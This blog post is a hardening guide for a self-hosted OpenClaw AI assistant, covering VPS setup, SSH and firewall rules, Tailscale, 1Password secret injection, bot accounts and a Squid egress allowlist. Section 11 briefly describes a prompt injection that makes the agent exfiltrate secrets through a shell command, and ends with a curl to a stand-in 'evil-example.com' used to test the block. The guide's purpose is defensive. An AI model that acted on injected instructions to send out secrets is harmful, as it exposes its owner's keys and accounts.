<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>My OpenClaw Setup Guide | Justin Flick</title>
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="My OpenClaw Setup Guide" />
<meta name="author" content="Justin Flick" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="This is a living document. OpenClaw is under active development, and parts of this guide will become outdated. I’ll keep it updated as the setup evolves." />
<meta property="og:description" content="This is a living document. OpenClaw is under active development, and parts of this guide will become outdated. I’ll keep it updated as the setup evolves." />
<link rel="canonical" href="https://justinflick.com/pr-preview/pr-12/2026/03/28/openclaw-setup-guide.html" />
<meta property="og:url" content="https://justinflick.com/pr-preview/pr-12/2026/03/28/openclaw-setup-guide.html" />
<meta property="og:site_name" content="Justin Flick" />
<meta property="og:image" content="https://justinflick.com/pr-preview/pr-12/assets/images/generated/openclaw-setup-guide-header.jpeg" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2026-03-28T00:00:00+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="https://justinflick.com/pr-preview/pr-12/assets/images/generated/openclaw-setup-guide-header.jpeg" />
<meta property="twitter:title" content="My OpenClaw Setup Guide" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Justin Flick"},"dateModified":"2026-03-28T00:00:00+00:00","datePublished":"2026-03-28T00:00:00+00:00","description":"This is a living document. OpenClaw is under active development, and parts of this guide will become outdated. I’ll keep it updated as the setup evolves.","headline":"My OpenClaw Setup Guide","image":"https://justinflick.com/pr-preview/pr-12/assets/images/generated/openclaw-setup-guide-header.jpeg","mainEntityOfPage":{"@type":"WebPage","@id":"https://justinflick.com/pr-preview/pr-12/2026/03/28/openclaw-setup-guide.html"},"url":"https://justinflick.com/pr-preview/pr-12/2026/03/28/openclaw-setup-guide.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/pr-preview/pr-12/assets/main.css"><link type="application/atom+xml" rel="alternate" href="https://justinflick.com/pr-preview/pr-12/feed.xml" title="Justin Flick" /></head>
<body><header class="site-header" role="banner">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/pr-preview/pr-12/">Justin Flick</a>
    <nav class="site-nav" aria-label="Main navigation"><a class="page-link" href="https://github.com/Jflick58" target="_blank" rel="noopener">github</a><a class="page-link" href="https://www.linkedin.com/in/justin-flick-88416b71/" target="_blank" rel="noopener">linkedin</a></nav>
  </div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header class="post-header">
    <h1 class="post-title" itemprop="name headline">My OpenClaw Setup Guide</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2026-03-28T00:00:00+00:00" itemprop="datePublished">
        March 28, 2026
      </time>
    </p>
  </header>

  
  <img class="post-header-image" src="/pr-preview/pr-12/assets/images/generated/openclaw-setup-guide-header.jpeg" alt="My OpenClaw Setup Guide">
  

  <div class="post-content e-content" itemprop="articleBody">
    <p><em>This is a living document. OpenClaw is under active development, and parts of this guide will become outdated. I’ll keep it updated as the setup evolves.</em></p>

<hr />

<p>I’ve been running <a href="https://openclaw.ai">OpenClaw</a> as a self-hosted personal AI assistant for a few weeks now. The default setup is straightforward, but getting it production-hardened, e.g. isolated network, secrets managed properly, browser sandboxed, prompt injection guarded — took considerably more work than the docs suggest. This guide is the consolidated version of what I’ve learned.</p>

<p>The goal here isn’t “quickest path to running OpenClaw.” It’s a setup you can trust slightly more than the default: one where a compromised prompt can’t exfiltrate your API keys, where your personal accounts stay untouched by bot activity, and where secrets aren’t sitting in plaintext on disk.</p>

<p>I’d suggest reading through the whole thing before starting. The sections build on each other in ways that aren’t always obvious, and a few ordering decisions — particularly around Tailscale, the <code class="language-plaintext highlighter-rouge">openclaw</code> system user, and the proxy setup — matter a lot.</p>

<hr />

<h2 id="1-vps-selection">1. VPS Selection</h2>

<p><strong>Recommended: Hetzner CPX31</strong> — 4 vCPU, 8 GB RAM, NVMe SSD, roughly $11/month. This is the community sweet spot for OpenClaw with browser automation and VNC. OpenClaw’s performance scales more with RAM and disk speed than raw CPU — the actual AI processing happens on model provider infrastructure (Anthropic, OpenAI, Google), not on your VPS. Your server handles the gateway, messaging, skill execution, and the Docker sandbox browser.</p>

<p><strong>Alternatives:</strong></p>
<ul>
  <li><strong>Budget:</strong> Hetzner CX22 — 2 vCPU, 4 GB RAM, ~$4/month. Tight but workable for basic setups without VNC.</li>
  <li><strong>US-based:</strong> DigitalOcean — 4 vCPU, 8 GB droplet, ~$24/month. Better US latency, excellent docs.</li>
  <li><strong>Free:</strong> Oracle Cloud Always Free — 4 vCPU, 24 GB ARM. Generous specs, but signup is inconsistent and some users report idle account terminations. Add a credit card and upgrade to Pay As You Go to be safe.</li>
</ul>

<p><strong>OS: Ubuntu Server 24.04 LTS.</strong> OpenClaw’s browser automation runs headless via Chrome DevTools Protocol — no display server needed. Ubuntu Server is lighter, smaller attack surface, fewer unnecessary services.</p>

<hr />

<h2 id="2-provision-the-vps">2. Provision the VPS</h2>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># SSH in with the key you uploaded</span>
ssh root@&lt;server-public-ip&gt;

<span class="c"># Change root password immediately (store in 1Password)</span>
passwd

<span class="c"># Update everything</span>
<span class="nb">sudo </span>apt update <span class="o">&amp;&amp;</span> <span class="nb">sudo </span>apt upgrade <span class="nt">-y</span> <span class="o">&amp;&amp;</span> <span class="nb">sudo </span>apt dist-upgrade <span class="nt">-y</span>

<span class="c"># Set hostname</span>
<span class="nb">sudo </span>hostnamectl set-hostname openclaw-server
</code></pre></div></div>

<p>After Tailscale is configured in the next step, you’ll lock SSH to the tailnet only and stop using the public IP entirely.</p>

<hr />

<h2 id="3-initial-server-hardening">3. Initial Server Hardening</h2>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Install essentials</span>
<span class="nb">sudo </span>apt <span class="nb">install</span> <span class="nt">-y</span> ufw fail2ban unattended-upgrades curl git jq

<span class="c"># Enable automatic security updates</span>
<span class="nb">sudo </span>dpkg-reconfigure <span class="nt">-plow</span> unattended-upgrades

<span class="c"># Create your admin user (don't keep using root)</span>
adduser yourusername
usermod <span class="nt">-aG</span> <span class="nb">sudo </span>yourusername

<span class="c"># Copy SSH key to the new user</span>
<span class="nb">mkdir</span> <span class="nt">-p</span> /home/yourusername/.ssh
<span class="nb">cp</span> ~/.ssh/authorized_keys /home/yourusername/.ssh/
<span class="nb">chown</span> <span class="nt">-R</span> yourusername:yourusername /home/yourusername/.ssh

<span class="c"># Firewall — allow SSH only for now</span>
<span class="nb">sudo </span>ufw default deny incoming
<span class="nb">sudo </span>ufw default allow outgoing
<span class="nb">sudo </span>ufw allow ssh
<span class="nb">sudo </span>ufw <span class="nb">enable</span>

<span class="c"># Harden SSH</span>
<span class="nb">sudo sed</span> <span class="nt">-i</span> <span class="s1">'s/#PermitRootLogin.*/PermitRootLogin no/'</span> /etc/ssh/sshd_config
<span class="nb">sudo sed</span> <span class="nt">-i</span> <span class="s1">'s/#PasswordAuthentication.*/PasswordAuthentication no/'</span> /etc/ssh/sshd_config
<span class="nb">sudo </span>systemctl restart ssh
</code></pre></div></div>

<p>Verify you can SSH in as your new user before disabling root login — test in a separate terminal first.</p>

<hr />

<h2 id="4-install-and-configure-tailscale">4. Install and Configure Tailscale</h2>

<p>Tailscale creates an encrypted WireGuard mesh between your devices. Once installed, the OpenClaw machine is accessible only from your tailnet — no public ports exposed.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-fsSL</span> https://tailscale.com/install.sh | sh

<span class="c"># Start with SSH enabled</span>
<span class="nb">sudo </span>tailscale up <span class="nt">--hostname</span> openclaw-server <span class="nt">--ssh</span>

<span class="c"># Verify and note your tailnet IP</span>
tailscale status
tailscale ip <span class="nt">-4</span>  <span class="c"># Note your 100.x.x.x address</span>
</code></pre></div></div>

<h3 id="lock-the-firewall-down-to-tailscale-only">Lock the firewall down to Tailscale only</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>ufw allow <span class="k">in </span>on tailscale0
<span class="nb">sudo </span>ufw delete allow ssh  <span class="c"># Remove public SSH access</span>
<span class="nb">sudo </span>ufw reload
</code></pre></div></div>

<p>From this point, the machine is only reachable via Tailscale. Test by SSHing to the Tailscale IP from a device on your tailnet before proceeding.</p>

<p><strong>Key rules:</strong></p>
<ul>
  <li><strong>Always use <code class="language-plaintext highlighter-rouge">tailscale serve</code></strong> to expose the OpenClaw dashboard — this keeps it private to your tailnet.</li>
  <li><strong>Never use <code class="language-plaintext highlighter-rouge">tailscale funnel</code></strong> for the dashboard or WebChat — Funnel exposes services to the public internet.</li>
</ul>

<hr />

<h2 id="5-create-a-dedicated-system-user">5. Create a Dedicated System User</h2>

<p>Never run OpenClaw as your admin user or as root. A dedicated user limits the blast radius if the agent misbehaves or is compromised.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Create the openclaw user with a home directory</span>
<span class="nb">sudo </span>useradd <span class="nt">-m</span> <span class="nt">-d</span> /home/openclaw <span class="nt">-s</span> /bin/bash openclaw

<span class="c"># Set a strong password (store in 1Password)</span>
<span class="nb">sudo </span>passwd openclaw

<span class="c"># Enable lingering so systemd user services work without an active login</span>
<span class="nb">sudo </span>loginctl enable-linger openclaw
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">openclaw</code> user should have no access to your personal home directory and no sudo privileges. Do not use <code class="language-plaintext highlighter-rouge">useradd -r</code> — system accounts don’t get systemd user sessions, which breaks the gateway service.</p>

<hr />

<h2 id="6-set-up-1password-secrets-management">6. Set Up 1Password Secrets Management</h2>

<p>Instead of storing API keys in plaintext <code class="language-plaintext highlighter-rouge">.env</code> files, use 1Password’s CLI with a service account to inject secrets at runtime.</p>

<h3 id="on-your-personal-machine">On your personal machine</h3>

<ol>
  <li>Create a new vault in 1Password called “OpenClaw” (service accounts can’t access Personal/Private vaults).</li>
  <li>Add your bot’s credentials to this vault as you create them — API keys, tokens, passwords. You don’t need everything now; add items as you go.</li>
  <li>Create a service account: 1Password.com → Developer → Service Accounts → Create. Name it “OpenClaw Server.” Grant it read-only access to the “OpenClaw” vault only. <strong>Save the token immediately</strong> — it’s only shown once.</li>
</ol>

<p>Service account permissions are immutable after creation. If you need to add vault access later, you must create a new service account.</p>

<h3 id="install-the-1password-cli-on-the-server">Install the 1Password CLI on the server</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># As your admin user (not openclaw), install the 1Password CLI</span>
<span class="nb">cd</span> /tmp
curl <span class="nt">-fsSL</span> https://cache.agilebits.com/dist/1P/op2/pkg/v2.30.0/op_linux_amd64_v2.30.0.zip <span class="nt">-o</span> op.zip
unzip op.zip
<span class="nb">sudo mv </span>op /usr/local/bin/
<span class="nb">rm </span>op.zip
op <span class="nt">--version</span>

<span class="c"># Switch to the openclaw user</span>
<span class="nb">sudo</span> <span class="nt">-i</span> <span class="nt">-u</span> openclaw

<span class="c"># Store the service account token with restrictive permissions</span>
<span class="nb">echo</span> <span class="s1">'export OP_SERVICE_ACCOUNT_TOKEN="ops_YOUR_TOKEN_HERE"'</span> <span class="o">&gt;</span> ~/.op_token
<span class="nb">chmod </span>600 ~/.op_token
<span class="nb">source</span> ~/.op_token

<span class="c"># Test that the CLI can reach your vault</span>
op vault list  <span class="c"># Should show the "OpenClaw" vault</span>
</code></pre></div></div>

<p>One honest tradeoff to acknowledge: the service account token (<code class="language-plaintext highlighter-rouge">ops_...</code>) must be stored somewhere on the machine in plaintext — that’s the one secret you can’t avoid. Restrict it to <code class="language-plaintext highlighter-rouge">600</code> permissions owned by the <code class="language-plaintext highlighter-rouge">openclaw</code> user, and accept that the machine needs outbound access to 1Password’s API at startup.</p>

<hr />

<h2 id="7-create-dedicated-bot-accounts">7. Create Dedicated Bot Accounts</h2>

<p>OpenClaw’s own security docs warn against signing the agent into your personal accounts. The isolation matters, and it’s worth the setup overhead.</p>

<h3 id="google-account-email--calendar">Google Account (email &amp; calendar)</h3>

<p>Google API access requires OAuth 2.0 — you can’t authenticate with just a username and password.</p>

<ol>
  <li>Create a new Google account (e.g., <code class="language-plaintext highlighter-rouge">yourname.agent@gmail.com</code>). Store the password in your “OpenClaw” vault.</li>
  <li><strong>Let the account age a few days before wiring up API access.</strong> Google’s abuse detection can flag brand new accounts that immediately start making API calls. Send a few normal emails, add a calendar event.</li>
  <li>Sign into <a href="https://console.cloud.google.com">Google Cloud Console</a> with the bot’s account. Create a new project.</li>
  <li>Enable: Gmail API, Google Calendar API, Google Drive API, Google Docs API, Google Sheets API, Google Slides API.</li>
  <li>Configure the OAuth consent screen:
    <ul>
      <li><strong>Audience:</strong> External user type. Add the bot’s email as a test user. Testing mode works fine — <code class="language-plaintext highlighter-rouge">gogcli</code> handles re-auth when tokens expire after 7 days.</li>
      <li><strong>Data Access:</strong> Add scopes for <code class="language-plaintext highlighter-rouge">gmail.modify</code>, <code class="language-plaintext highlighter-rouge">calendar.events</code>, <code class="language-plaintext highlighter-rouge">drive</code>, <code class="language-plaintext highlighter-rouge">documents</code>, <code class="language-plaintext highlighter-rouge">spreadsheets</code>, <code class="language-plaintext highlighter-rouge">presentations</code>. If scopes don’t appear in the picker, paste them manually — they only show up for APIs you’ve already enabled.</li>
    </ul>
  </li>
  <li>Create OAuth credentials: APIs &amp; Services → Credentials → Create Credentials → OAuth client ID.
    <ul>
      <li>Application type: <strong>“Web application”</strong> — not Desktop app. Desktop app clients don’t allow custom redirect URIs, which <code class="language-plaintext highlighter-rouge">gogcli</code> needs on headless servers.</li>
      <li>Authorized redirect URI: <code class="language-plaintext highlighter-rouge">http://127.0.0.1:8080/oauth2/callback</code></li>
      <li>Download the credentials JSON.</li>
    </ul>
  </li>
  <li>Transfer to the server:
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkdir</span> <span class="nt">-p</span> ~/.openclaw/credentials
scp client_secret_<span class="k">*</span>.json openclaw@&lt;tailscale-ip&gt;:~/.openclaw/credentials/google-credentials.json
</code></pre></div>    </div>
  </li>
</ol>

<p><strong>Install gogcli on the server:</strong></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># As your admin user</span>
<span class="nb">sudo </span>apt <span class="nb">install</span> <span class="nt">-y</span> golang-go make
<span class="nb">cd</span> /tmp
git clone https://github.com/steipete/gogcli.git
<span class="nb">cd </span>gogcli
make build
<span class="nb">sudo mv </span>bin/gog /usr/local/bin/
<span class="nb">cd</span> /tmp <span class="o">&amp;&amp;</span> <span class="nb">rm</span> <span class="nt">-rf</span> gogcli
gog <span class="nt">--version</span>
</code></pre></div></div>

<p><strong>Authorize (headless OAuth via SSH tunnel):</strong></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># As the openclaw user</span>
gog auth credentials ~/.openclaw/credentials/google-credentials.json
</code></pre></div></div>

<p>The OAuth flow requires a browser. Since the server is headless, forward port 8080:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># On your local machine</span>
ssh <span class="nt">-N</span> <span class="nt">-L</span> 8080:127.0.0.1:8080 openclaw@&lt;tailscale-ip&gt;
</code></pre></div></div>

<p>Then on the server in a separate session:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gog auth add yourname.agent@gmail.com <span class="se">\</span>
  <span class="nt">--listen-addr</span> 127.0.0.1:8080 <span class="se">\</span>
  <span class="nt">--services</span> gmail,calendar,drive,docs,sheets,slides <span class="se">\</span>
  <span class="nt">--force-consent</span> <span class="se">\</span>
  <span class="nt">--timeout</span> 10m
</code></pre></div></div>

<p>This prints an OAuth URL. Open it in your local browser — the SSH tunnel routes the callback back to the server. Sign in with the bot’s Google account and approve permissions.</p>

<p><strong>Persist the keyring password:</strong></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat</span> <span class="o">&gt;&gt;</span> ~/.bashrc <span class="o">&lt;&lt;</span> <span class="sh">'</span><span class="no">EOF</span><span class="sh">'

# gogcli
export GOG_KEYRING_PASSWORD="&lt;your-keyring-password&gt;"
export GOG_ACCOUNT="yourname.agent@gmail.com"
</span><span class="no">EOF
</span></code></pre></div></div>

<p>Store <code class="language-plaintext highlighter-rouge">GOG_KEYRING_PASSWORD</code> in 1Password (vault: OpenClaw, title: <code class="language-plaintext highlighter-rouge">GOG_KEYRING_PASSWORD</code>, field: <code class="language-plaintext highlighter-rouge">credential</code>) and add to <code class="language-plaintext highlighter-rouge">~/.openclaw/.env</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GOG_KEYRING_PASSWORD=op://OpenClaw/GOG_KEYRING_PASSWORD/credential
</code></pre></div></div>

<p>Add <code class="language-plaintext highlighter-rouge">GOG_ACCOUNT</code> as a plain <code class="language-plaintext highlighter-rouge">Environment=</code> line in the systemd service file — it’s not a secret.</p>

<h3 id="github-machine-user-account">GitHub Machine User Account</h3>

<p>GitHub’s docs explicitly support “machine user” accounts — regular accounts created to automate activity. This gives the bot its own identity for commits, PRs, and co-authorship. Machine users also work with the standard fork-and-PR workflow for repos you don’t own, which GitHub Apps cannot do.</p>

<ol>
  <li>Create a new GitHub account using the bot’s email. Username like <code class="language-plaintext highlighter-rouge">yourname-agent</code>.</li>
  <li>Enable 2FA. Store the TOTP secret in <strong>your personal</strong> vault (not the bot’s — the bot authenticates via PAT, which bypasses 2FA).</li>
  <li>Generate a fine-grained PAT from the bot account. Scope it to specific repositories. Minimum permissions: Contents read/write, Pull requests read/write. Set 90-day expiration with a rotation reminder.</li>
  <li>Store the PAT in your “OpenClaw” vault. Invite the bot as a collaborator on repos it needs access to.</li>
</ol>

<p><strong>Configure Git on the server:</strong></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># As your admin user, install GitHub CLI</span>
curl <span class="nt">-fsSL</span> https://cli.github.com/packages/githubcli-archive-keyring.gpg | <span class="nb">sudo dd </span><span class="nv">of</span><span class="o">=</span>/usr/share/keyrings/githubcli-archive-keyring.gpg
<span class="nb">echo</span> <span class="s2">"deb [arch=</span><span class="si">$(</span>dpkg <span class="nt">--print-architecture</span><span class="si">)</span><span class="s2"> signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main"</span> | <span class="nb">sudo tee</span> /etc/apt/sources.list.d/github-cli.list
<span class="nb">sudo </span>apt update <span class="o">&amp;&amp;</span> <span class="nb">sudo </span>apt <span class="nb">install</span> <span class="nt">-y</span> gh

<span class="c"># As the openclaw user</span>
git config <span class="nt">--global</span> user.name <span class="s2">"yourname-agent"</span>
git config <span class="nt">--global</span> user.email <span class="s2">"yourname.agent@gmail.com"</span>

<span class="c"># Authenticate with the PAT (pipe it to avoid shell history)</span>
op <span class="nb">read</span> <span class="s2">"op://OpenClaw/github-bot/pat"</span> | gh auth login <span class="nt">--with-token</span>
gh auth setup-git
</code></pre></div></div>

<p>After this, the agent can run <code class="language-plaintext highlighter-rouge">git clone</code>, <code class="language-plaintext highlighter-rouge">git push</code>, and <code class="language-plaintext highlighter-rouge">gh pr create</code> without knowing anything about authentication.</p>

<h3 id="telegram-bot">Telegram Bot</h3>

<p>Create this before installing OpenClaw — the onboarding wizard will ask for the token.</p>

<ol>
  <li>Open Telegram, search <code class="language-plaintext highlighter-rouge">@BotFather</code>, send <code class="language-plaintext highlighter-rouge">/newbot</code>.</li>
  <li>Choose a display name (e.g., “Justin’s Assistant”) and a username ending in <code class="language-plaintext highlighter-rouge">bot</code> (e.g., <code class="language-plaintext highlighter-rouge">justins_openclaw_bot</code>).</li>
  <li>BotFather replies with a bot token. Store it in your “OpenClaw” vault.</li>
  <li>Get your Telegram user ID: search <code class="language-plaintext highlighter-rouge">@userinfobot</code> and start a chat. It returns a numeric ID — save it for the allowlist in Section 15.</li>
</ol>

<hr />

<h2 id="8-install-openclaw">8. Install OpenClaw</h2>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># As the openclaw user</span>
curl <span class="nt">-fsSL</span> https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
<span class="nb">source</span> ~/.bashrc
nvm <span class="nb">install </span>22
nvm use 22

npm <span class="nb">install</span> <span class="nt">-g</span> openclaw@latest

<span class="c"># Run the onboarding wizard</span>
openclaw onboard <span class="nt">--install-daemon</span>
</code></pre></div></div>

<p>The wizard walks you through choosing a provider, a messaging channel, and basic skills. Paste API keys directly to get things running — we’ll switch to 1Password-injected secrets next. I personally use OpenAI as my provider via Oauth to reuse my ChatGPT subscription.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openclaw status
openclaw doctor  <span class="c"># Surfaces risky or misconfigured settings</span>
</code></pre></div></div>

<h3 id="switch-to-1password-secrets-injection">Switch to 1Password secrets injection</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat</span> <span class="o">&gt;</span> ~/.openclaw/.env <span class="o">&lt;&lt;</span> <span class="sh">'</span><span class="no">EOF</span><span class="sh">'
TELEGRAM_BOT_TOKEN=op://OpenClaw/Telegram Bot Token/credential
ANTHROPIC_API_KEY=op://OpenClaw/ANTHROPIC_API_KEY/credential
GEMINI_API_KEY=op://OpenClaw/GEMINI_API_KEY/credential
SLACK_BOT_TOKEN=op://OpenClaw/SLACK_BOT_TOKEN/credential
SLACK_APP_TOKEN=op://OpenClaw/SLACK_APP_TOKEN/credential
GOG_KEYRING_PASSWORD=op://OpenClaw/GOG_KEYRING_PASSWORD/credential
</span><span class="no">EOF
</span></code></pre></div></div>

<p>Only include references for keys you’ve already added to the vault. The format is <code class="language-plaintext highlighter-rouge">op://VaultName/ItemName/FieldName</code>.</p>

<p>Test it:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openclaw gateway stop
op run <span class="nt">--env-file</span><span class="o">=</span>~/.openclaw/.env <span class="nt">--</span> openclaw gateway
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">op run</code> resolves each <code class="language-plaintext highlighter-rouge">op://</code> reference at runtime, injecting real values into the process. Once confirmed working, you can remove the plaintext keys the onboarding wizard wrote to <code class="language-plaintext highlighter-rouge">~/.openclaw/agents/&lt;agentId&gt;/agent/auth-profiles.json</code>.</p>

<hr />

<h2 id="9-configure-multi-model-routing">9. Configure Multi-Model Routing</h2>

<p>The goal: cheap models for routine tasks, expensive ones only when needed.</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"agents"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"defaults"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"model"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
        </span><span class="nl">"primary"</span><span class="p">:</span><span class="w"> </span><span class="s2">"openai/gpt-5-4"</span><span class="p">,</span><span class="w">
        </span><span class="nl">"fallbacks"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
          </span><span class="s2">"google/gemini-3-flash-preview"</span><span class="p">,</span><span class="w">
          </span><span class="s2">"anthropic/claude-sonnet-4-5"</span><span class="w">
        </span><span class="p">]</span><span class="w">
      </span><span class="p">},</span><span class="w">
      </span><span class="nl">"heartbeat"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
        </span><span class="nl">"model"</span><span class="p">:</span><span class="w"> </span><span class="s2">"google/gemini-3-flash-preview"</span><span class="w">
      </span><span class="p">}</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p><strong>On-the-fly model switching</strong> from chat:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/model anthropic/claude-opus-4-6    # Switch to Opus for a hard task
/model openai/gpt-5-mini            # Switch back
</code></pre></div></div>

<p>Add model aliases in <code class="language-plaintext highlighter-rouge">openclaw.json</code> so you can type <code class="language-plaintext highlighter-rouge">/model opus</code> instead of the full path.</p>

<p><strong>A note on OpenAI subscription access:</strong> Anthropic cracked down on third-party tools using subscription OAuth in January 2026. OpenAI could do the same. Always keep API-based fallbacks (Gemini, Claude) configured and tested so you’re not stranded if subscription access gets revoked.</p>

<hr />

<h2 id="10-set-provider-level-spend-limits">10. Set Provider-Level Spend Limits</h2>

<p>OpenClaw has no built-in spend cap. Enforce limits at the provider level — this is actually better, since it stops runaway costs even if OpenClaw has a bug.</p>

<table>
  <thead>
    <tr>
      <th>Provider</th>
      <th>Where to set limits</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Anthropic</td>
      <td>console.anthropic.com → Plans &amp; Billing. Set a monthly spending cap. API returns errors once reached.</td>
    </tr>
    <tr>
      <td>OpenAI</td>
      <td>platform.openai.com → Billing → Limits. Set a hard monthly limit. Also set email alerts at 50%, 75%, 90%.</td>
    </tr>
    <tr>
      <td>Google/Gemini</td>
      <td>console.cloud.google.com → Billing → Budgets &amp; Alerts. Create a budget with hard cap.</td>
    </tr>
  </tbody>
</table>

<p>Natural fallback protection: when your Anthropic cap is hit, the API returns errors, OpenClaw sees failures, and falls back to your Gemini or OpenAI model for the rest of the month.</p>

<hr />

<h2 id="11-network-egress-control-split-architecture">11. Network Egress Control (Split Architecture)</h2>

<p>This is the most important hardening step, and the one that gets skipped most often.</p>

<p>The problem: the OpenClaw gateway holds all your secrets — API keys, OAuth tokens, 1Password token. But the browser needs open internet access to browse arbitrary sites. Run both with unrestricted egress and a prompt injection can exfiltrate secrets via a shell command. Lock both down with a strict allowlist and you cripple the browser.</p>

<p>The solution is to split them: gateway traffic goes through a domain allowlist, browser traffic goes directly to the internet but has no access to secrets.</p>

<p><img src="/pr-preview/pr-12/assets/images/generated/openclaw-setup-guide-split-egress.jpeg" alt="Two paths, two constraints — the gateway's traffic filtered, the browser's left open but isolated" /></p>

<table>
  <thead>
    <tr>
      <th>Component</th>
      <th>Network access</th>
      <th>Has secrets?</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>OpenClaw Gateway</td>
      <td>Allowlisted domains only (via Squid)</td>
      <td>Yes — all API keys, 1Password token, config</td>
    </tr>
    <tr>
      <td>Sandbox Browser (Docker)</td>
      <td>Open internet</td>
      <td>No — no env vars, no volume mounts</td>
    </tr>
  </tbody>
</table>

<h3 id="step-1-install-and-configure-squid-proxy">Step 1: Install and configure Squid proxy</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>apt <span class="nb">install</span> <span class="nt">-y</span> squid

<span class="nb">sudo tee</span> /etc/squid/allowed_domains.txt <span class="o">&gt;</span> /dev/null <span class="o">&lt;&lt;</span> <span class="sh">'</span><span class="no">EOF</span><span class="sh">'
# AI providers
.anthropic.com
.claude.ai
.openai.com
.googleapis.com
.google.com
# Tooling
.github.com
.githubusercontent.com
.npmjs.org
# Channels
.telegram.org
.slack.com
.slack-edge.com
# 1Password + Tailscale
.1password.com
.tailscale.com
# Auth
.auth0.com
# Python tooling
.astral.sh
.pypi.org
.pythonhosted.org
</span><span class="no">EOF

</span><span class="nb">sudo cp</span> /etc/squid/squid.conf /etc/squid/squid.conf.bak

<span class="nb">sudo tee</span> /etc/squid/squid.conf <span class="o">&gt;</span> /dev/null <span class="o">&lt;&lt;</span> <span class="sh">'</span><span class="no">EOF</span><span class="sh">'
http_port 3128

acl allowed_domains dstdomain "/etc/squid/allowed_domains.txt"
acl localnet src 127.0.0.0/8
acl SSL_ports port 443
acl CONNECT method CONNECT

http_access allow localnet allowed_domains
http_access allow CONNECT localnet SSL_ports allowed_domains
http_access deny all
</span><span class="no">EOF

</span><span class="nb">sudo </span>systemctl restart squid
<span class="nb">sudo </span>systemctl <span class="nb">enable </span>squid
</code></pre></div></div>

<h3 id="step-2-route-the-gateway-through-the-proxy">Step 2: Route the gateway through the proxy</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat</span> <span class="o">&gt;&gt;</span> /home/openclaw/.bashrc <span class="o">&lt;&lt;</span> <span class="sh">'</span><span class="no">EOF</span><span class="sh">'
export HTTP_PROXY=http://127.0.0.1:3128
export HTTPS_PROXY=http://127.0.0.1:3128
export NO_PROXY=127.0.0.1,localhost
</span><span class="no">EOF
</span></code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">NO_PROXY</code> ensures the gateway can reach the browser container’s CDP port on localhost without going through the proxy.</p>

<h3 id="step-3-verify-the-browser-container-is-not-proxied">Step 3: Verify the browser container is not proxied</h3>

<p>The sandbox browser container runs in Docker with its own network stack and does not inherit the host’s proxy environment variables. No additional Docker networking configuration is needed — the isolation already exists.</p>

<h3 id="step-4-test-it">Step 4: Test it</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># As the openclaw user</span>
curl https://evil-example.com  <span class="c"># Should fail (blocked by Squid)</span>
curl https://api.anthropic.com <span class="c"># Should succeed (allowlisted)</span>
</code></pre></div></div>

